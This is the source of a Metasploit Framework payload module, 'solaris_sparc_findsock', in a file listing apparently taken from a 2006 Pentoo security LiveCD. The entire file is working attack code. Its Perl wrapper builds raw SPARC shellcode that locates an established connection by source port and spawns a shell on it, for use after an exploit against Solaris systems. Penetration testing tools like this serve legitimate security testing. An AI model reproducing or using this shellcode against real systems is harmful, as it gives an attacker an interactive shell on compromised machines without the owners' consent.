home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / usr / lib / metasploit / payloads / solaris_sparc_findsock.pm < prev    next >
Text File  |  2006-06-30  |  2KB  |  71 lines

  1.  
  2. ##
  3. # This file is part of the Metasploit Framework and may be redistributed
  4. # according to the licenses defined in the Authors field below. In the
  5. # case of an unknown or missing license, this file defaults to the same
  6. # license as the core Framework (dual GPLv2 and Artistic). The latest
  7. # version of the Framework can always be obtained from metasploit.com.
  8. ##
  9.  
  10. package Msf::Payload::solaris_sparc_findsock;
  11. use base 'Msf::PayloadComponent::FindConnection';
  12. use strict;
  13. use Pex::SPARC;
  14.  
  15. my $info =
  16. {
  17.   'Name'         => 'Solaris SPARC SrcPort Find Shell',
  18.   'Version'      => '$Revision: 1.1 $',
  19.   'Description'  => 'Spawn a shell on the established connection',
  20.   'Authors'      => [ 'vlad902 <vlad902 [at] gmail.com>', ],
  21.   'Arch'         => [ 'sparc' ],
  22.   'Priv'         => 0,
  23.   'OS'           => [ 'solaris' ],
  24.   'Size'         => '',
  25.   'UserOpts'     =>
  26.     {
  27.       'CPORT' => [1, 'PORT', 'Local port used by exploit'],
  28.     }
  29. };
  30.  
  31. sub new {
  32.   my $class = shift;
  33.   my $hash = @_ ? shift : { };
  34.   $hash = $class->MergeHashRec($hash, {'Info' => $info});
  35.   my $self = $class->SUPER::new($hash, @_);
  36.  
  37.   $self->_Info->{'Size'} = $self->_GenSize;
  38.   return($self);
  39. }
  40.  
  41. sub Build {
  42.   my $self = shift;
  43.   return($self->Generate($self->GetVar('CPORT')));
  44. }
  45.  
  46. sub Generate {
  47.   my $self = shift;
  48.   my $port = shift;
  49.  
  50.   my $shellcode =
  51.     Pex::SPARC::Set($port, "l6").
  52.     "\x9c\x2b\xa0\x07\x90\x1a\x80\x0a\xd0\x23\xbf\xe8\x90\x02\x20\x01".
  53.     "\x90\x0a\x2f\xff\x92\x10\x20\x10\xd0\x3b\xbf\xf8\x94\x23\xa0\x04".
  54.     "\x92\x23\xa0\x18\x82\x10\x20\xf3\x91\xd0\x20\x08\x94\x10\x20\x03".
  55.     "\xea\x13\xbf\xea\xba\x9d\x40\x16\x12\xbf\xff\xf5\xd0\x03\xbf\xf8".
  56.     "\x92\x10\x20\x09\x94\xa2\xa0\x01\x82\x10\x20\x3e\x91\xd0\x20\x08".
  57.     "\x12\xbf\xff\xfb\x96\x1a\xc0\x0b\x21\x0b\xd8\x9a\xa0\x14\x21\x6e".
  58.     "\x23\x0b\xdc\xda\x90\x23\xa0\x10\x92\x23\xa0\x08\xe0\x3b\xbf\xf0".
  59.     "\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x08";
  60.  
  61.   return $shellcode;
  62. }
  63.  
  64. sub _GenSize {
  65.   my $self = shift;
  66.   my $bin = $self->Generate('4444');
  67.   return(length($bin));
  68. }
  69.  
  70. 1;
  71.